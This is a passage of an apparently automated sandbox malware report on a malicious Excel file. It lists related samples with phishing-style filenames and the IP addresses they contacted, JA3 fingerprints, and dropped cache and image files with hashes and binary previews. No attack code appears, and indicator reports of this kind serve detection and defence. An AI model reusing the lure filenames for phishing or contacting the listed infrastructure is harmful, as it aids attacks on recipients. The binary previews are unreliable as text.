                                                                                          hQtNCi8128.exeGet hashmaliciousBrowse
                                                                                          • 192.169.69.25
                                                                                          FB11.exeGet hashmaliciousBrowse
                                                                                          • 216.244.74.42
                                                                                          CDFCB9455FC457AC23BE82004BDCF4120E3C8D6FD2918.exeGet hashmaliciousBrowse
                                                                                          • 192.169.69.25
                                                                                          EUjk8F87b8.exeGet hashmaliciousBrowse
                                                                                          • 192.169.69.25
                                                                                          MglhrJiLUL.exeGet hashmaliciousBrowse
                                                                                          • 192.169.69.26
                                                                                          On35KJkYT4.exeGet hashmaliciousBrowse
                                                                                          • 192.169.69.26
                                                                                          ORDER-0319.pdf.exeGet hashmaliciousBrowse
                                                                                          • 192.169.69.25
                                                                                          ORDER-21031566AF.exeGet hashmaliciousBrowse
                                                                                          • 192.169.69.25
                                                                                          ttmPnejtED.jsGet hashmaliciousBrowse
                                                                                          • 192.169.69.25
                                                                                          3Ad4ZKWT0L.exeGet hashmaliciousBrowse
                                                                                          • 192.169.69.25
                                                                                          EbJIveZLAv.exeGet hashmaliciousBrowse
                                                                                          • 192.169.69.26
                                                                                          Order_List.xlsxGet hashmaliciousBrowse
                                                                                          • 192.169.69.26
                                                                                          BROADBANDONEUScatalog-1180297109.xlsmGet hashmaliciousBrowse
                                                                                          • 75.119.136.137
                                                                                          catalog-1180297109.xlsmGet hashmaliciousBrowse
                                                                                          • 75.119.136.137
                                                                                          11.xlsmGet hashmaliciousBrowse
                                                                                          • 75.119.136.137
                                                                                          11.xlsmGet hashmaliciousBrowse
                                                                                          • 75.119.136.137
                                                                                          catalog-22001865.xlsmGet hashmaliciousBrowse
                                                                                          • 75.119.136.137
                                                                                          catalog-22001865.xlsmGet hashmaliciousBrowse
                                                                                          • 75.119.136.137
                                                                                          catalog-1571722150.xlsmGet hashmaliciousBrowse
                                                                                          • 75.119.136.137
                                                                                          catalog-1571722150.xlsmGet hashmaliciousBrowse
                                                                                          • 75.119.136.137
                                                                                          catalog-634355975.xlsmGet hashmaliciousBrowse
                                                                                          • 75.119.136.137
                                                                                          catalog-641455000.xlsmGet hashmaliciousBrowse
                                                                                          • 75.119.136.137
                                                                                          catalog-634355975.xlsmGet hashmaliciousBrowse
                                                                                          • 75.119.136.137
                                                                                          catalog-641455000.xlsmGet hashmaliciousBrowse
                                                                                          • 75.119.136.137
                                                                                          catalog-1482570486.xlsmGet hashmaliciousBrowse
                                                                                          • 75.119.136.137
                                                                                          catalog-1482570486.xlsmGet hashmaliciousBrowse
                                                                                          • 75.119.136.137
                                                                                          catalog-1134436431.xlsmGet hashmaliciousBrowse
                                                                                          • 75.119.136.137
                                                                                          catalog-1134436431.xlsmGet hashmaliciousBrowse
                                                                                          • 75.119.136.137
                                                                                          catalog-138717734.xlsmGet hashmaliciousBrowse
                                                                                          • 75.119.136.137
                                                                                          OVHFRdlWwfCMS3x.exeGet hashmaliciousBrowse
                                                                                          • 51.254.187.177
                                                                                          catalog-1840888847.xlsmGet hashmaliciousBrowse
                                                                                          • 198.50.218.68
                                                                                          catalog-1840888847.xlsmGet hashmaliciousBrowse
                                                                                          • 198.50.218.68
                                                                                          Ac5RA9R99F.exeGet hashmaliciousBrowse
                                                                                          • 213.186.33.5
                                                                                          catalog-1576384985.xlsmGet hashmaliciousBrowse
                                                                                          • 198.50.218.68
                                                                                          catalog-1576384985.xlsmGet hashmaliciousBrowse
                                                                                          • 198.50.218.68
                                                                                          RFQ_R4100131210.pdf.exeGet hashmaliciousBrowse
                                                                                          • 51.91.199.155
                                                                                          4345473.docGet hashmaliciousBrowse
                                                                                          • 146.59.152.166
                                                                                          Facture-FR5W4785.htmlGet hashmaliciousBrowse
                                                                                          • 213.186.33.87
                                                                                          OUTSTANDING_INV_Statement_953008.xlsGet hashmaliciousBrowse
                                                                                          • 167.114.17.32
                                                                                          OUTSTANDING_INV_Statement_953008.xlsGet hashmaliciousBrowse
                                                                                          • 54.39.16.153
                                                                                          catalog-193510902.xlsmGet hashmaliciousBrowse
                                                                                          • 198.50.218.68
                                                                                          catalog-193510902.xlsmGet hashmaliciousBrowse
                                                                                          • 198.50.218.68
                                                                                          4QwdcKOvum.exeGet hashmaliciousBrowse
                                                                                          • 213.186.33.5
                                                                                          gfZJSjB68y.exeGet hashmaliciousBrowse
                                                                                          • 51.195.53.221
                                                                                          catalog-187543341.xlsmGet hashmaliciousBrowse
                                                                                          • 198.50.218.68
                                                                                          catalog-187543341.xlsmGet hashmaliciousBrowse
                                                                                          • 198.50.218.68
                                                                                          PEMBAYARAN COPY TT_PDF.gz.exeGet hashmaliciousBrowse
                                                                                          • 51.195.53.221
                                                                                          Bank swift.exeGet hashmaliciousBrowse
                                                                                          • 54.38.220.85
                                                                                          Invoice #473.xlsmGet hashmaliciousBrowse
                                                                                          • 51.89.48.112

                                                                                          JA3 Fingerprints

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          7dcce5b76c8b17472d024758970a406bAPRemittanceAdvice.xlsxGet hashmaliciousBrowse
                                                                                          • 198.50.218.68
                                                                                          • 75.119.136.137
                                                                                          catalog-1840888847.xlsmGet hashmaliciousBrowse
                                                                                          • 198.50.218.68
                                                                                          • 75.119.136.137
                                                                                          technical sheet.docGet hashmaliciousBrowse
                                                                                          • 198.50.218.68
                                                                                          • 75.119.136.137
                                                                                          catalog-1576384985.xlsmGet hashmaliciousBrowse
                                                                                          • 198.50.218.68
                                                                                          • 75.119.136.137
                                                                                          Fox(04-09-15-47-23).xlsxGet hashmaliciousBrowse
                                                                                          • 198.50.218.68
                                                                                          • 75.119.136.137
                                                                                          Quotation of 210409 from KOSEN-1.xlsxGet hashmaliciousBrowse
                                                                                          • 198.50.218.68
                                                                                          • 75.119.136.137
                                                                                          4345473.docGet hashmaliciousBrowse
                                                                                          • 198.50.218.68
                                                                                          • 75.119.136.137
                                                                                          OUTSTANDING_INV_Statement_953008.xlsGet hashmaliciousBrowse
                                                                                          • 198.50.218.68
                                                                                          • 75.119.136.137
                                                                                          OUTSTANDING_INV_Statement_953008.xlsGet hashmaliciousBrowse
                                                                                          • 198.50.218.68
                                                                                          • 75.119.136.137
                                                                                          catalog-193510902.xlsmGet hashmaliciousBrowse
                                                                                          • 198.50.218.68
                                                                                          • 75.119.136.137
                                                                                          REMITTANCE_ADVICE_REF0000360261.xlsxGet hashmaliciousBrowse
                                                                                          • 198.50.218.68
                                                                                          • 75.119.136.137
                                                                                          PRC-20-518 ORIGINAL.xlsxGet hashmaliciousBrowse
                                                                                          • 198.50.218.68
                                                                                          • 75.119.136.137
                                                                                          REMITTANCE ADVICE REF0000360261.xlsxGet hashmaliciousBrowse
                                                                                          • 198.50.218.68
                                                                                          • 75.119.136.137
                                                                                          Paid Invoice.docxGet hashmaliciousBrowse
                                                                                          • 198.50.218.68
                                                                                          • 75.119.136.137
                                                                                          catalog-187543341.xlsmGet hashmaliciousBrowse
                                                                                          • 198.50.218.68
                                                                                          • 75.119.136.137
                                                                                          presupuesto.xlsxGet hashmaliciousBrowse
                                                                                          • 198.50.218.68
                                                                                          • 75.119.136.137
                                                                                          catalog-1535859458.xlsmGet hashmaliciousBrowse
                                                                                          • 198.50.218.68
                                                                                          • 75.119.136.137
                                                                                          OUTSTANDING_INV_Statement_934737.xlsGet hashmaliciousBrowse
                                                                                          • 198.50.218.68
                                                                                          • 75.119.136.137
                                                                                          Covid-19 Payroll Tax Adjustment.docxGet hashmaliciousBrowse
                                                                                          • 198.50.218.68
                                                                                          • 75.119.136.137
                                                                                          xEkyQl1Yn2.rtfGet hashmaliciousBrowse
                                                                                          • 198.50.218.68
                                                                                          • 75.119.136.137

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                                          Category:dropped
                                                                                          Size (bytes):58596
                                                                                          Entropy (8bit):7.995478615012125
                                                                                          Encrypted:true
                                                                                          SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                                          MD5:61A03D15CF62612F50B74867090DBE79
                                                                                          SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                                          SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                                          SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                                          Malicious:false
                                                                                          Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):893
                                                                                          Entropy (8bit):7.366016576663508
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                                                          MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                                                          SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                                                          SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                                                          SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                                                          Malicious:false
                                                                                          Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):326
                                                                                          Entropy (8bit):3.0866919007032374
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:kKXRVlkwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:/RVywTJrkPlE99SNxAhUe0ht
                                                                                          MD5:CEAAA4E04209B0FFCEA52D3A191FEB9B
                                                                                          SHA1:F501D6F6DAD5CFFF0F3DB41DA79FF09B28F3BC48
                                                                                          SHA-256:F8611D1E403EED88F6CAA73F9A5E996EE863622A119BA9B4183253D03F1DAF3B
                                                                                          SHA-512:B956E1B69C143A71DA3BE79F6D01BF82C6A4BB5515F440CC68F66AA1D0063253052F3F9CB468EFDCE1B7FFBF3E4D1C4BCC91EB9C37AE2EAEE001EC965D6A9698
                                                                                          Malicious:false
                                                                                          Preview: p...... ........ ic3.6..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):252
                                                                                          Entropy (8bit):2.9853979364525847
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:kkFklx+E/ltfllXlE/jQEBllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1Ffl5n0:kKBE/l6QE1liBAIdQZV7ulPPN
                                                                                          MD5:441CEF7BA660DBB2ECBA2C5B139F08E7
                                                                                          SHA1:0261785E844E677EC1B7209D28542C1B5A3B5755
                                                                                          SHA-256:86C18242A3F3B7AB4E9A79683A65471D2240429B1E5509496CE3D965F6FCD761
                                                                                          SHA-512:418931C68B631008CB99827F135E17AFD1DB9A1A27C576A1E60669F3EF45B60AA45127348B04E6A25536A2F4792510E5F1E55D563606AE6111B2B79146D56C01
                                                                                          Malicious:false
                                                                                          Preview: p...... ....`...A..4.6..(....................................................... .........|.j-......(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.b.f.8.d.f.8.0.6.2.7.0.0."...
                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4BF2B4E.png
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
                                                                                          Category:dropped
                                                                                          Size (bytes):8301
                                                                                          Entropy (8bit):7.970711494690041
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
                                                                                          MD5:D8574C9CC4123EF67C8B600850BE52EE
                                                                                          SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
                                                                                          SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
                                                                                          SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
                                                                                          Malicious:false
                                                                                          Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\50ED048C.png
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                          Category:dropped
                                                                                          Size (bytes):557
                                                                                          Entropy (8bit):7.343009301479381
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                                                                                          MD5:A516B6CB784827C6BDE58BC9D341C1BD
                                                                                          SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                                                                                          SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                                                                                          SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                                                                                          Malicious:false
                                                                                          Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\558EF0E2.png
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                          Category:dropped
                                                                                          Size (bytes):557
                                                                                          Entropy (8bit):7.343009301479381
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                                                                                          MD5:A516B6CB784827C6BDE58BC9D341C1BD
                                                                                          SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                                                                                          SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                                                                                          SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                                                                                          Malicious:false
                                                                                          Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6ABC4B4.png
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
                                                                                          Category:dropped
                                                                                          Size (bytes):8301
                                                                                          Entropy (8bit):7.970711494690041
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
                                                                                          MD5:D8574C9CC4123EF67C8B600850BE52EE
                                                                                          SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
                                                                                          SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
                                                                                          SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
                                                                                          Malicious:false
                                                                                          Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A39446F7.png
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:PNG image data, 485 x 185, 8-bit/color RGB, non-interlaced
                                                                                          Category:dropped
                                                                                          Size (bytes):34763
                                                                                          Entropy (8bit):7.986637319641011
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:lA0uJplS4SbWDJkL9JHwQ6PJ62J9BW5/B8CViyDN/2FYpoHnmAG:en/dDuL7QQ64eyZJViW++poHnu
                                                                                          MD5:D2305F0A3120806573D5FE3059DDB37D
                                                                                          SHA1:2337E6CBC06F4C594514D2D19B0B6511FEB1E52D
                                                                                          SHA-256:94CA1D71554FAF2112290CF3DECB6C5C853E916E73EC7F2E00162ED468C29AAC
                                                                                          SHA-512:9E68F2AFCF83AFCEA3569CC42F232F276EAAB8EE7E5D0642DA1512BF159AC1E9E777289FD30EADE38A46CAA0965A59CC8899B44ACD46B2BEDF1E4A800AD33419
                                                                                          Malicious:false
                                                                                          Preview: .PNG........IHDR..............i......sRGB.........pHYs..........+.....pIDATx^....]E.>...{%..@.R....]...>....?...>....`C...kHBBz.7...o......{...#.sg.^.f.5......{P.I5.j`.h....'.X.p..k...7l.j.*.Te>..loo.?~....8..3g...z.......Z....R......./5`6-Y.dY.r..-[.4d>;v.hjj...hnn..h.......5j..>#F.....5.......,.3fL.lw*...@..{H..k.U.....~..5k..%...t.[..c.>..=...:...5.D..x=.{-.y/k.........}......G......U..s.^z..]t...<yruu.n}]Zy..@....GRy....m.......E...:......D.;v.)S...g.../?..S...:.?.H...E*I...P...Y...s....C...W.v ..y.^.....).^.!}..@..{^.........q>.H.......R....7.+.x.._=u..~"R*.n.@..U.i..X......=...7.p.-.8H.3.GE*...z.^...M.8......Q.)^..^Ke...Z.........^..a..d.......}.co|..{QG....@.....R)....z.?...w.y.CE`......y.....;..T.>..5..u..T.=...,..I.....?...o.w..6.e/{.g>...#}TeZM..@....WR.... ..u..._......_.....n.!.gmm-.;.ZSS..:.&..}.t......Y0...Z.<..O|...\p..C....w.I..x.'.....i`..0.R3.7n...{/b..2m.4Q-3g.4i.....o.j.M.q.....6..i..A.|...T+V.X.t).
                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D24E477B.png
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                          Category:dropped
                                                                                          Size (bytes):848
                                                                                          Entropy (8bit):7.595467031611744
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                                                                                          MD5:02DB1068B56D3FD907241C2F3240F849
                                                                                          SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                                                                                          SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                                                                                          SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                                                                                          Malicious:false
                                                                                          Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FCACB525.png
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:PNG image data, 485 x 185, 8-bit/color RGB, non-interlaced
                                                                                          Category:dropped
                                                                                          Size (bytes):34763
                                                                                          Entropy (8bit):7.986637319641011
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:lA0uJplS4SbWDJkL9JHwQ6PJ62J9BW5/B8CViyDN/2FYpoHnmAG:en/dDuL7QQ64eyZJViW++poHnu
                                                                                          MD5:D2305F0A3120806573D5FE3059DDB37D
                                                                                          SHA1:2337E6CBC06F4C594514D2D19B0B6511FEB1E52D
                                                                                          SHA-256:94CA1D71554FAF2112290CF3DECB6C5C853E916E73EC7F2E00162ED468C29AAC
                                                                                          SHA-512:9E68F2AFCF83AFCEA3569CC42F232F276EAAB8EE7E5D0642DA1512BF159AC1E9E777289FD30EADE38A46CAA0965A59CC8899B44ACD46B2BEDF1E4A800AD33419
                                                                                          Malicious:false
                                                                                          Preview: .PNG........IHDR..............i......sRGB.........pHYs..........+.....pIDATx^....]E.>...{%..@.R....]...>....?...>....`C...kHBBz.7...o......{...#.sg.^.f.5......{P.I5.j`.h....'.X.p..k...7l.j.*.Te>..loo.?~....8..3g...z.......Z....R......./5`6-Y.dY.r..-[.4d>;v.hjj...hnn..h.......5j..>#F.....5.......,.3fL.lw*...@..{H..k.U.....~..5k..%...t.[..c.>..=...:...5.D..x=.{-.y/k.........}......G......U..s.^z..]t...<yruu.n}]Zy..@....GRy....m.......E...:......D.;v.)S...g.../?..S...:.?.H...E*I...P...Y...s....C...W.v ..y.^.....).^.!}..@..{^.........q>.H.......R....7.+.x.._=u..~"R*.n.@..U.i..X......=...7.p.-.8H.3.GE*...z.^...M.8......Q.)^..^Ke...Z.........^..a..d.......}.co|..{QG....@.....R)....z.?...w.y.CE`......y.....;..T.>..5..u..T.=...,..I.....?...o.w..6.e/{.g>...#}TeZM..@....WR.... ..u..._......_.....n.!.gmm-.;.ZSS..:.&..}.t......Y0...Z.<..O|...\p..C....w.I..x.'.....i`..0.R3.7n...{/b..2m.4Q-3g.4i.....o.j.M.q.....6..i..A.|...T+V.X.t).
                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FD85031D.png
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                          File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                          Category:modified
                                                                                          Size (bytes):848
                                                                                          Entropy (8bit):7.595467031611744
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                                                                                          MD5:02DB1068B56D3FD907241C2F3240F849
